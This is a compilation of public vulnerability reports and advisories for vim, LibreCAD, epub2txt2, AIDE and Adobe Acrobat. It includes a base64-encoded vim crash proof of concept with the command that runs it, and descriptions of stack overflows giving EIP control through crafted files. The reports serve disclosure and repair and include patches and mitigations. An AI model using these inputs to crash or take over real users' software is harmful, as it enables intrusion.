Heap-based Buffer Overflow in GitHub repository vim/vim prior to 8.2.

**Description**

*   Heap Overflow and arbitrary 41 bytes write.
    
*   Unsorted bin doubly linked list corruption.
    
*   commit hash : 058ee7c5699ef551be5aa04c66b3cffc436e9b08
    

**Proof of Concept**

    $ echo -ne "bm9ybTBv7wX//wUwIDUwMDAwMDAwezAtMDAwMP/yAAD6MDAwMDAwMDAwMDQwKSkpMDAQMDAwMDAw
    AAogIFVpbCFub3JtCPkICAgIEAAAAA4KICBzFCwUFBQUFBQUFBQUFBQUFGxrsWUKICBzaWwhbm9y
    bQgICBj31/cwFhcYsk8qAAQwMjIyMjIiMjKAMDAwMDAwMDAwMDCAADAAAAEA/38AADAwMCVkZ4Vv
    ZXh0YBQUFBQPa25lMDAwfAACdCAUFBQUD2tuZQnTNnIyMjIyMjIyMDAwMDBAMDA2NjY2NsbGAAHC
    xjAwAQAwMDAwMDAwMDQwgBkBADAwMDAyMDAwMDBTMDAwMDAwgDARMDAwMDBAMDAwMDAwMDA3MEUw
    MDAwMDAwMDBSMHAwLTAwMDAwMDAwMDAwMDAwMDAwMDAwMDBAMDAwMDAwMDAwNDAwAH8wMDAwMDAw
    MIAwnjCyTyp8fHx8fHx0IDBNMDAwMAAAMDAwMAAKICBzaWwhbm9ybQgICAgIEDAwMDAwMDA2MDAw
    MCIwMEAwMDAwfWdnZ2lnZ2dOJ2dVZ2dnZ2dnZ2dnZ2cmMDAwMDAyMDB4dCAUFBQUD2tuZQogMDAw
    MDAwMDAwMCEwADAwAAAAgDAwMDAwMDD/fyAwMA9LEzAwMDAwMHswLTAwMDD/8gAA+jAwMDAwMDAw
    MDA0MCkpKTAwRjowMMDAwGV4dGAUFBQUD2tuZTAwMDD1LzD/fxUwMDAwMDAwMBNTU1NTU1NTU1NT
    U1NTU1NTMDAwMDAeMDAcMDBwAAEwgAAwODAwMDAwMDA8MDAwMDAwMDBNMDAZMDAwMDAwXzcwMDAw
    MDAwMDAwMDAwMDgwMDAwMDErMDAwLxEwMP8wMDAwMDAwMDMwAAAAQDAwMDAwMDAwMCEwADAwAAAA
    gDAwMBowMDAwTTAwMDAwMDAwMDA3MDAwMDAA/zAICAgWFw6yTyoDZ3kwMPoACiAgMDAwMDAwMAA=" | base64 -d > poc
    
    $ /home/alkyne/fuzzing/vim_asan/src/vim -u NONE -i NONE -n -X -Z -e -m -s -S poc  -c ":qa!"
    ïÿ0 50000000{0-01777777777777777777777ÿò
    ïÿ0 50000000{0-01777777777777777777777ÿò
    =================================================================
    ==3619358==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x602000007473 at pc 0x000000495b45 bp 0x7ffd1dd9e330 sp 0x7ffd1dd9daf8
    WRITE of size 41 at 0x602000007473 thread T0
        #0 0x495b44 in __asan_memmove (/home/alkyne/fuzzing/vim_asan/src/vim+0x495b44)
        #1 0x51ee94 in memmove /usr/include/x86_64-linux-gnu/bits/string_fortified.h:40:10
        #2 0x51ee94 in ins_char_bytes /home/alkyne/fuzzing/vim_asan/src/change.c:1094:2
        #3 0x51f6fe in ins_char /home/alkyne/fuzzing/vim_asan/src/change.c:1003:5
        #4 0x988589 in swapchar /home/alkyne/fuzzing/vim_asan/src/ops.c:1445:6
        #5 0x99b554 in swapchars /home/alkyne/fuzzing/vim_asan/src/ops.c:1379:16
        #6 0x99b554 in op_tilde /home/alkyne/fuzzing/vim_asan/src/ops.c:1303:17
        #7 0x99b554 in do_pending_operator /home/alkyne/fuzzing/vim_asan/src/ops.c:4109:3
        #8 0x93bb29 in normal_cmd /home/alkyne/fuzzing/vim_asan/src/normal.c:1146:2
        #9 0x70ce2b in exec_normal /home/alkyne/fuzzing/vim_asan/src/ex_docmd.c
        #10 0x70bb3c in exec_normal_cmd /home/alkyne/fuzzing/vim_asan/src/ex_docmd.c:8601:5
        #11 0x70bb3c in ex_normal /home/alkyne/fuzzing/vim_asan/src/ex_docmd.c:8519:6
        #12 0x6e337c in do_one_cmd /home/alkyne/fuzzing/vim_asan/src/ex_docmd.c:2573:2
        #13 0x6e337c in do_cmdline /home/alkyne/fuzzing/vim_asan/src/ex_docmd.c:993:17
        #14 0xbbae2d in do_source /home/alkyne/fuzzing/vim_asan/src/scriptfile.c:1512:5
        #15 0xbb8e8c in cmd_source /home/alkyne/fuzzing/vim_asan/src/scriptfile.c:1098:14
        #16 0xbb8e8c in ex_source /home/alkyne/fuzzing/vim_asan/src/scriptfile.c:1124:2
        #17 0x6e337c in do_one_cmd /home/alkyne/fuzzing/vim_asan/src/ex_docmd.c:2573:2
        #18 0x6e337c in do_cmdline /home/alkyne/fuzzing/vim_asan/src/ex_docmd.c:993:17
        #19 0xf99d44 in exe_commands /home/alkyne/fuzzing/vim_asan/src/main.c:3091:2
        #20 0xf99d44 in vim_main2 /home/alkyne/fuzzing/vim_asan/src/main.c:774:2
        #21 0xf9677f in main /home/alkyne/fuzzing/vim_asan/src/main.c:426:12
        #22 0x7fdf81c100b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16
        #23 0x41da9d in _start (/home/alkyne/fuzzing/vim_asan/src/vim+0x41da9d)
    
    0x602000007473 is located 0 bytes to the right of 3-byte region [0x602000007470,0x602000007473)
    allocated by thread T0 here:
        #0 0x4961dd in malloc (/home/alkyne/fuzzing/vim_asan/src/vim+0x4961dd)
        #1 0x4c5e15 in lalloc /home/alkyne/fuzzing/vim_asan/src/alloc.c:248:11
    
    SUMMARY: AddressSanitizer: heap-buffer-overflow (/home/alkyne/fuzzing/vim_asan/src/vim+0x495b44) in __asan_memmove
    Shadow bytes around the buggy address:
      0x0c047fff8e30: fa fa fd fa fa fa fd fa fa fa fd fa fa fa fd fa
      0x0c047fff8e40: fa fa fd fa fa fa fd fa fa fa fd fa fa fa fd fa
      0x0c047fff8e50: fa fa fd fa fa fa fd fa fa fa fd fa fa fa fd fa
      0x0c047fff8e60: fa fa fd fa fa fa fd fa fa fa fd fa fa fa fd fa
      0x0c047fff8e70: fa fa fd fa fa fa fd fa fa fa fd fa fa fa fd fa
    =>0x0c047fff8e80: fa fa 02 fa fa fa 03 fa fa fa 01 fa fa fa[03]fa
      0x0c047fff8e90: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c047fff8ea0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c047fff8eb0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c047fff8ec0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c047fff8ed0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07
      Heap left redzone:       fa
      Freed heap region:       fd
      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack after return:      f5
      Stack use after scope:   f8
      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Container overflow:      fc
      Array cookie:            ac
      Intra object redzone:    bb
      ASan internal:           fe
      Left alloca redzone:     ca
      Right alloca redzone:    cb
      Shadow gap:              cc
    ==3619358==ABORTING
    
    

**Impact**

Heap Overflow may lead to execute arbitrary code.

CVE-2022-0361: Heap-based Buffer Overflow in vim

CVE-2022-0359: Heap-based Buffer Overflow in vim

A buffer overflow vulnerability in CDataList of the jwwlib component of LibreCAD 2.2.0-rc3 and older allows an attacker to achieve Remote Code Execution using a crafted JWW document.

**Vulnerable Products**

*   LibreCAD 2.2.0-rc3 and older

**Steps to reproduce or sample file**

1.  Start LibreCAD 2.2.0 in a debugger
    
2.  File/Open...
    
3.  Unzip and open the attached proof-of-concept file
    
4.  Observe ACCESS_VIOLATION crash, with eip=0x41414141 (AAAA)
    

Screenshot:

**Cause**

The CDataList entity deserialization in LibreCAD/libraries/jwwlib/src/jwwdoc.h is vulnerable to a stack buffer overflow. char buf[512] declared in CDataList::Serialize() on line 784 is of fixed size 512. One variety of CDataList provides its own size field, as seen on line 795 and no bounds checking is performed. This allows an attacker to overflow buf and overwrite other stack variables, including the return address.

The attached PoC file is tuned to trigger this behavior in the latest windows release of LibreCAD, but the same bug is also present  
in older versions and on other platforms.

**Note**: This is similar to, but distinct from issue #1462

**Impact**

An attacker can craft a JW-CAD input file and thereby gain control over execution flow (EIP controlled directly).

This allows an attacker to run arbitrary code on the system running LibreCAD, with the privileges of the current user.

**Proposed Mitigation**

1.  Perform bounds checking in CDataList::Serialize(), and refuse to load more data to buf than actually supported.
2.  Enable stack smashing protection in the windows build of LibreCAD.

**Operating System and LibreCAD version info**

Version: 2.2.0-rc3  
Compiler: GNU GCC 7.3.0  
Compiled on: Nov 29 2021  
Qt Version: 5.12.4  
Boost Version: 1.65.1  
System: Windows 10 (10.0)

CVE-2021-45342: Remote Code Execution vulnerability in LibreCAD 2.2.0-rc3 (JWW CDataList) · Issue #1464 · LibreCAD/LibreCAD

A buffer overflow vulnerability in CDataMoji of the jwwlib component of LibreCAD 2.2.0-rc3 and older allows an attacker to achieve Remote Code Execution using a crafted JWW document.

**Vulnerable Products**

*   LibreCAD 2.2.0-rc3 and older
*   Jw\_cad 8.24a and older

**Steps to reproduce or sample file**

1.  Start LibreCAD 2.2.0-rc3 in a debugger
2.  File/Open...
3.  Unzip and open the attached proof of concept file
4.  Observe ACCESS_VIOLATION crash, with eip=0x41414141 (AAAA)

Screenshot:

**Cause**

The CDataMoji entity deserialization at LibreCAD/libraries/jwwlib/src/jwwdoc.h is vulnerable to  
a stack buffer overflow.  
char buf[512] declared in CDataMoji::Serialize() on line 512  
is of fixed size 512. Some varieties of CDataMoji provide their own size, e.g. MojiData2 on line 523  
and no bounds checking is performed. This allows an attacker to overflow buf and overwrite other stack variables,  
including the return address.

The attached PoC file is tuned to trigger this behavior in the latest windows release of LibreCAD, but the same bug is also present  
in older versions and on other platforms.

**Impact**

An attacker can craft a JW-CAD input file and thereby gain control over execution flow (EIP controlled directly).

This allows an attacker to run arbitrary code on the system running LibreCAD, with the privileges of the current user.

**Proposed Mitigation**

1.  Perform bounds checking in CDataMoji::Serialize(), and refuse to load the file if it would overflow buf.
2.  Enable stack smashing protection in the windows build of LibreCAD.

**Operating System and LibreCAD version info**

Version: 2.2.0-rc3  
Compiler: GNU GCC 7.3.0  
Compiled on: Nov 29 2021  
Qt Version: 5.12.4  
Boost Version: 1.65.1  
System: Windows 10 (10.0)

CVE-2021-45341: Remote Code Execution vulnerability in LibreCAD 2.2.0-rc3 (JWW CDataMoji) · Issue #1462 · LibreCAD/LibreCAD

xhtml_translate_entity in xhtml.c in epub2txt (aka epub2txt2) through 2.02 allows a stack-based buffer overflow via a crafted EPUB document.

**Description**

A stack-buffer-overflow was discovered in epub2txt2.  
The issue is being triggered in function xhtml\_translate\_entity() at src/xhtml.c:576

**Version**

Version 2.02 (Lastest)

**Environment**

Ubuntu 18.04, 64bit

**Reproduce****Command**

    git clone the Lastest Version firstly.
    make && make install
    ./epub2txt poc
    

POC file at the bottom of this report.

**With ASAN**

Note: You can use ASAN for more direct verification.

    Compile program with address sanitizer with this command:
    VERSION := 2.02
    CC      := gcc
    CFLAGS  := -Wall -fPIC -fPIE
    LDLAGS  := -pie 
    DESTDIR :=
    PREFIX  := /usr
    BINDIR  := /bin
    MANDIR  := /share/man
    APPNAME := epub2txt
    
    TARGET	:= epub2txt 
    SOURCES := $(shell find src/ -type f -name *.c)
    OBJECTS := $(patsubst src/%,build/%,$(SOURCES:.c=.o))
    DEPS	:= $(OBJECTS:.o=.deps)
    
    $(TARGET): $(OBJECTS)
    	$(CC) -fsanitize=address -o $(TARGET) $(LDFLAGS) $(OBJECTS) 
    
    build/%.o: src/%.c
    	@mkdir -p build/
    	$(CC) $(CFLAGS) -fsanitize=address -g -DVERSION=\"$(VERSION)\" -DAPPNAME=\"$(APPNAME)\" -MD -MF $(@:.o=.deps) -c -o $@ $< 
    
    clean:
    	$(RM) -r build/ $(TARGET) 
    
    install:
    	install -D -m 755 $(APPNAME) $(DESTDIR)/$(PREFIX)/$(BINDIR)/$(APPNAME)
    	install -D -m 644 man1/epub2txt.1 $(DESTDIR)/$(PREFIX)/$(MANDIR)/man1/epub2txt.1
    
    uninstall:
    	rm -f $(DESTDIR)/$(PREFIX)/$(BINDIR)/$(APPNAME)
    	rm -f $(DESTDIR)/$(PREFIX)/$(MANDIR)/man1/epub2txt.1
    
    -include $(DEPS)
    
    .PHONY: clean install
    
    

**ASAN Report**

    warning [./input/id:000029,sig:11,src:000553,time:174169875,op:havoc,rep:4]:  3 extra bytes at beginning or within zipfile
      (attempting to process anyway)
    file #1:  bad zipfile offset (local header sig):  3
      (attempting to re-compensate)
    /tmp/epub2txt14993/OEBPS/cover.xml  bad CRC aa74ee30  (should be 4874d916)
      error:  invalid compressed data to inflate /tmp/epub2txt14993/OEBPS/images/GeographyofBli-cover.jpg
    file #8:  bad zipfile offset (local header sig):  163411
      (attempting to re-compensate)
    file #8:  bad zipfile offset (local header sig):  163411
    file #9:  bad zipfile offset (local header sig):  181495
    /tmp/epub2txt14993/OEBPS/GeographyofBli_toc.html  bad CRC 0938f2f2  (should be 64dedce7)
    /tmp/epub2txt14993/OEBPS/GeographyofBli_copyright.html  bad CRC 5d8cbd1a  (should be 9b5bfa5d)
    /tmp/epub2txt14993/OEBPS/GeographyofBli_body_split_001.html  bad CRC 1a36209f  (should be 81fec8f3)
    =================================================================
    ==14993==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7fffffffcb14 at pc 0x7ffff6e7e3a6 bp 0x7fffffffca60 sp 0x7fffffffc208
    WRITE of size 305 at 0x7fffffffcb14 thread T0
        #0 0x7ffff6e7e3a5  (/usr/lib/x86_64-linux-gnu/libasan.so.4+0x663a5)
        #1 0x55555558000e in xhtml_translate_entity src/xhtml.c:576
        #2 0x555555580b34 in xhtml_to_stdout src/xhtml.c:789
        #3 0x555555580680 in xhtml_file_to_stdout src/xhtml.c:700
        #4 0x555555560476 in epub2txt_do_file src/epub2txt.c:494
        #5 0x55555555d3c9 in main src/main.c:187
        #6 0x7ffff6a48bf6 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21bf6)
        #7 0x55555555c219 in _start (/home/nisl1/nisl8121/Asteriska/fuzz/projects/epub2txt2-master/valid/epub2txt+0x8219)
    
    Address 0x7fffffffcb14 is located in stack of thread T0 at offset 116 in frame
        #0 0x55555557fad4 in xhtml_translate_entity src/xhtml.c:532
    
      This frame has 2 object(s):
        [32, 36) 'v'
        [96, 116) 'out' <== Memory access at offset 116 overflows this variable
    HINT: this may be a false positive if your program uses some custom stack unwind mechanism or swapcontext
          (longjmp and C++ exceptions *are* supported)
    SUMMARY: AddressSanitizer: stack-buffer-overflow (/usr/lib/x86_64-linux-gnu/libasan.so.4+0x663a5) 
    Shadow bytes around the buggy address:
      0x10007fff7910: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x10007fff7920: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x10007fff7930: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x10007fff7940: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x10007fff7950: 00 00 00 00 f1 f1 f1 f1 04 f2 f2 f2 f2 f2 f2 f2
    =>0x10007fff7960: 00 00[04]f2 00 00 00 00 00 00 00 00 00 00 00 00
      0x10007fff7970: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x10007fff7980: 00 00 f1 f1 f1 f1 f8 f2 f2 f2 00 00 00 00 00 00
      0x10007fff7990: 00 00 00 00 00 00 00 00 f1 f1 f1 f1 00 f2 f2 f2
      0x10007fff79a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x10007fff79b0: 00 00 00 00 00 00 f1 f1 f1 f1 f8 f2 f2 f2 f2 f2
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07 
      Heap left redzone:       fa
      Freed heap region:       fd
      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack after return:      f5
      Stack use after scope:   f8
      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Container overflow:      fc
      Array cookie:            ac
      Intra object redzone:    bb
      ASan internal:           fe
      Left alloca redzone:     ca
      Right alloca redzone:    cb
    ==14993==ABORTING
    
    

**POC**

POC

Any issue plz contact with me:  
admin@hack.best  
OR:  
twitter: @Asteriska8

CVE-2022-23850: [Bug Report]stack-buffer-overflow in Function epub2txt_do_file() AT src/epub2txt.c · Issue #17 · kevinboone/epub2txt2

Heap-based Buffer Overflow in vim/vim prior to 8.2.

@@ -1309,5 +1309,14 @@ func Test\_visual\_reselect\_with\_count()

call delete('XvisualReselect')

endfunc

  

func Test\_visual\_block\_insert\_round\_off()

new

" The number of characters are tuned to fill a 4096 byte allocated block,

" so that valgrind reports going over the end.

call setline(1, \['xxxxx', repeat('0', 1350), "\\t", repeat('x', 60)\])

exe "normal gg0\\<C-V>GI" .. repeat('0', 1320) .. "\\<Esc>"

bwipe!

endfunc

  

  

" vim: shiftwidth\=2 sts\=2 expandtab

CVE-2022-0318: patch 8.2.4151: reading beyond the end of a line · vim/vim@57df9e8

AIDE before 0.17.4 allows local users to obtain root privileges via crafted file metadata (such as XFS extended attributes or tmpfs ACLs), because of a heap-based buffer overflow.

*   Products
    *   Openwall GNU/\*/Linux   _server OS_
    *   Linux Kernel Runtime Guard
    *   John the Ripper   _password cracker_
        *   Free & Open Source for any platform
        *   in the cloud
        *   Pro for Linux
        *   Pro for macOS
    *   Wordlists   _for password cracking_
    *   passwdqc   _policy enforcement_
        *   Free & Open Source for Unix
        *   Pro for Windows (Active Directory)
    *   yescrypt   _KDF & password hashing_
    *   yespower   _Proof-of-Work (PoW)_
    *   crypt\_blowfish   _password hashing_
    *   phpass   _ditto in PHP_
    *   tcb   _better password shadowing_
    *   Pluggable Authentication Modules
    *   scanlogd   _port scan detector_
    *   popa3d   _tiny POP3 daemon_
    *   blists   _web interface to mailing lists_
    *   msulogin   _single user mode login_
    *   php\_mt\_seed   _mt\_rand() cracker_
*   Services
*   Publications
    *   Articles
    *   Presentations
*   Resources
    *   Mailing lists
    *   Community wiki
    *   Source code repositories (GitHub)
    *   Source code repositories (CVSweb)
    *   File archive & mirrors
    *   How to verify digital signatures
    *   OVE IDs
*   What's new

CVE-2021-45417: oss-security - CVE-2021-45417 - aide (>= 0.13 <= 0.17.3): heap-based buffer overflow vulnerability in base64 functions

@@ -536,24 +536,29 @@ block\_insert(

if (b\_insert)

{

off = (\*mb\_head\_off)(oldp, oldp + offset + spaces);

spaces -= off;

count -= off;

}

else

{

off = (\*mb\_off\_next)(oldp, oldp + offset);

offset += off;

// spaces fill the gap, the character that's at the edge moves

// right

off = (\*mb\_head\_off)(oldp, oldp + offset);

offset -= off;

}

spaces -= off;

count -= off;

}

if (spaces < 0) // can happen when the cursor was moved

spaces = 0;

  

newp = alloc(STRLEN(oldp) + s\_len + count + 1);

// Make sure the allocated size matches what is actually copied below.

newp = alloc(STRLEN(oldp) + spaces + s\_len

\+ (spaces > 0 && !bdp->is\_short ? ts\_val - spaces : 0)

\+ count + 1);

if (newp == NULL)

continue;

  

// copy up to shifted part

mch\_memmove(newp, oldp, (size\_t)(offset));

mch\_memmove(newp, oldp, (size\_t)offset);

oldp += offset;

  

// insert pre-padding

@@ -564,14 +569,21 @@ block\_insert(

mch\_memmove(newp + startcol, s, (size\_t)s\_len);

offset += s\_len;

  

if (spaces && !bdp->is\_short)

if (spaces \> 0 && !bdp->is\_short)

{

// insert post-padding

vim\_memset(newp + offset + spaces, ' ', (size\_t)(ts\_val - spaces));

// We're splitting a TAB, don't copy it.

oldp++;

// We allowed for that TAB, remember this now

count++;

if (\*oldp == TAB)

{

// insert post-padding

vim\_memset(newp + offset + spaces, ' ',

(size\_t)(ts\_val - spaces));

// we're splitting a TAB, don't copy it

oldp++;

// We allowed for that TAB, remember this now

count++;

}

else

// Not a TAB, no extra spaces

count = spaces;

}

  

if (spaces > 0)

@@ -1598,7 +1610,7 @@ op\_insert(oparg\_T \*oap, long count1)

oap->start\_vcol = t;

}

else if (oap->op\_type == OP\_APPEND

&& oap->end.col + oap->end.coladd

&& oap->start.col + oap->start.coladd

\>= curbuf->b\_op\_start\_orig.col

\+ curbuf->b\_op\_start\_orig.coladd)

{

CVE-2022-0261: patch 8.2.4120: block insert goes over the end of the line · vim/vim@9f8c304

Acrobat Reader DC version 21.007.20099 (and earlier), 20.004.30017 (and earlier) and 17.011.30204 (and earlier) are affected by a use-after-free vulnerability in the processing of Format event actions that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.

Security update available for Adobe Acrobat and Reader  | APSB22-01

**Bulletin ID**

**Date Published**

**Priority**

APSB22-01

January 11, 2022

2

**Summary**

Adobe has released security updates for Adobe Acrobat and Reader for Windows and macOS. These updates address  multiple critical, important and moderate vulnerabilities. Successful exploitation could lead to arbitrary code execution, memory leak, application denial of service,  security feature bypass and privilege escalation. 

**Affected Versions**

**Product**

**Track**

**Affected Versions**

**Platform**

Acrobat DC 

Continuous 

21.007.20099 and earlier versions  

Windows

Acrobat Reader DC

Continuous 

21.007.20099 and earlier versions

Windows

Acrobat DC 

Continuous 

21.007.20099 and earlier versions

macOS

Acrobat Reader DC

Continuous 

21.007.20099 and earlier versions

macOS

Acrobat 2020  

Classic 2020             

20.004.30017 and earlier versions  

Windows & macOS  

Acrobat Reader 2020  

Classic 2020             

20.004.30017 and earlier versions   

Windows & macOS  

Acrobat 2017

Classic 2017

17.011.30204  and earlier versions            

Windows & macOS  

Acrobat Reader 2017

Classic 2017

17.011.30204  and earlier versions        

Windows & macOS  

For questions regarding Acrobat DC, please visit the Acrobat DC FAQ page. 

**Solution**

Adobe recommends users update their software installations to the latest versions by following the instructions below.    

The latest product versions are available to end users via one of the following methods:    

*   Users can update their product installations manually by choosing Help > Check for Updates.     
    
*   The products will update automatically, without requiring user intervention, when updates are detected.      
    
*   The full Acrobat Reader installer can be downloaded from the Acrobat Reader Download Center.     
    

For IT administrators (managed environments):     

*   Refer to the specific release note version for links to installers.     
    
*   Install updates via your preferred methodology, such as AIP-GPO, bootstrapper, SCUP/SCCM (Windows), or on macOS, Apple Remote Desktop and SSH.     
    

Adobe categorizes these updates with the following priority ratings and recommends users update their installation to the newest version:    

**Product**

**Track**

**Updated Versions**

**Platform**

**Priority Rating**

**Availability**

Acrobat DC

Continuous

21.011.20039  

Windows and macOS

2

Release Notes     

Acrobat Reader DC

Continuous

21.011.20039  

Windows and macOS

2

Release Notes     

Acrobat 2020  

Classic 2020             

20.004.30020  

Windows and macOS       

2

Release Notes     

Acrobat Reader 2020  

Classic 2020             

20.004.30020  

Windows and macOS       

2

Release Notes     

Acrobat 2017

Classic 2017

17.011.30207  

Windows and macOS

2

Release Notes     

Acrobat Reader 2017

Classic 2017

17.011.30207  

Windows and macOS

2

Release Notes     

**Vulnerability Details**

**Vulnerability Category**

**Vulnerability Impact**

**Severity**

**CVSS base score**

CVSS vector

**CVE Number**

Use After Free (CWE-416)

Arbitrary code execution 

Critical

7.8

CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CVE-2021-44701

Information Exposure (CWE-200)  

Privilege escalation

Moderate

3.1

CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:N/A:N  

CVE-2021-44702

Stack-based Buffer Overflow (CWE-121)

Arbitrary code execution

Critical

7.8

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CVE-2021-44703

Use After Free (CWE-416)

Arbitrary code execution

Critical

7.8

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CVE-2021-44704

Access of Uninitialized Pointer (CWE-824)

Arbitrary code execution

Critical

7.8

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CVE-2021-44705

Use After Free (CWE-416)

Arbitrary code execution

Critical

7.8

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CVE-2021-44706

Out-of-bounds Write (CWE-787)

Arbitrary code execution

Critical

7.8

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CVE-2021-44707

Heap-based Buffer Overflow (CWE-122)

Arbitrary code execution

Critical

7.8

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CVE-2021-44708

Heap-based Buffer Overflow (CWE-122)

Arbitrary code execution

Critical

7.8

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CVE-2021-44709

Use After Free (CWE-416)

Arbitrary code execution

Critical

7.8

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CVE-2021-44710

Integer Overflow or Wraparound (CWE-190)

Arbitrary code execution

Critical

7.8

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CVE-2021-44711

Improper Input Validation (CWE-20)

Application denial-of-service

Important

4.4

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:L

CVE-2021-44712

Use After Free (CWE-416)

Application denial-of-service

Important

5.5

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H

CVE-2021-44713

Violation of Secure Design Principles (CWE-657)

Security feature bypass

Moderate

2.5

CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:L/I:N/A:N

CVE-2021-44714

Out-of-bounds Read (CWE-125)

Memory Leak

Moderate

3.3

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N

CVE-2021-44715

Information Exposure (CWE-200)  

Privilege escalation  

Moderate

3.1

CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:N/A:N  

CVE-2021-44739

NULL Pointer Dereference (CWE-476)

Application denial-of-service

Moderate

3.3

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L

CVE-2021-44740

NULL Pointer Dereference (CWE-476)

Application denial-of-service

Moderate

3.3

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L

CVE-2021-44741

Out-of-bounds Read (CWE-125)

Memory Leak

Moderate

3.3

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N

CVE-2021-44742

Out-of-bounds Read (CWE-125)

Arbitrary code execution

Critical

7.8

CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CVE-2021-45060

Out-of-bounds Write (CWE-787)

Arbitrary code execution

Critical

7.8

CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CVE-2021-45061

Use After Free (CWE-416)

Arbitrary code execution

Critical

7.8

CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CVE-2021-45062

Use After Free (CWE-416)

Privilege escalation

Moderate

3.3

CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N

CVE-2021-45063

Use After Free (CWE-416)

Arbitrary code execution

Critical

7.8

CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CVE-2021-45064

Access of Memory Location After End of Buffer (CWE-788)

Memory Leak

Important

5.5

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N

CVE-2021-45067

Out-of-bounds Write (CWE-787)

Arbitrary code execution

Critical

7.8

CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CVE-2021-45068

Out-of-bounds Write (CWE-787)  

Arbitrary code execution  

Critical

7.8

CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CVE-2022-24092  

Out-of-bounds Write (CWE-787)  

Arbitrary code execution  

Critical

7.8

CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CVE-2022-24091

**Acknowledgements**

Adobe would like to thank the following for reporting these issues and for working with Adobe to help protect our customers:   

*   Ashfaq Ansari and Krishnakant Patil - HackSys Inc working with Trend Micro Zero Day Initiative (CVE-2021-44701)
*   j00sean (j00sean) (CVE-2021-44702, CVE-2021-44739)
*   Kai Lu of Zscaler's ThreatLabz (CVE-2021-44703, CVE-2021-44708, CVE-2021-44709, CVE-2021-44740, CVE-2021-44741)
*   PangU via TianfuCup (CVE-2021-44704)
*   StakLeader via TianfuCup and Mat Powell of Trend Micro Zero Day Initiative (CVE-2021-44705)
*   bee13oy of Kunlun Lab via TianfuCup (CVE-2021-44706)
*   Vulnerability Research Institute Juvenile Via TianfuCup and Mat Powell of Trend Micro Zero Day Initiative  
    (CVE-2021-44707)
*   Jaewon Min and Aleksandar Nikolic of Cisco Talos (CVE-2021-44710, CVE-2021-44711)
*   Sanjeev Das (sd001) (CVE-2021-44712)  
    
*   Rocco Calvi (TecR0c) and Steven Seeley of Qihoo 360 (CVE-2021-44713, CVE-2021-44715)
*   chamal (chamal) (CVE-2021-44714)
*   fr0zenrain of Baidu Security (fr0zenrain) (CVE-2021-44742)  
    
*   Anonymous working with Trend Micro Zero Day Initiative (CVE-2021-45060, CVE-2021-45061, CVE-2021-45062, CVE-2021-45063; CVE-2021-45068, CVE-2021-45064)
*   Ashfaq Ansari and Krishnakant Patil - HackSys Inc (CVE-2021-45067)
*   Mat Powell of Trend Micro Zero Day Initiative (CVE-2022-24092, CVE-2022-24091)

**Revisions:**

